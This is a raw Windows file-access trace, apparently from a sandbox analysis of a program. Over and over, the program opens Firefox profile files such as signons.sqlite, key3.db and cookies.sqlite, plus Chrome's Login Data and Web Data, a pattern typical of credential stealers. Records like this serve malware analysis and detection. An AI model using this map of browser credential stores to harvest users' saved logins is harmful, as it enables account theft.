Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	3	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	3	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	desired_access = FILE_READ_ATTRIBUTES	2	Fn
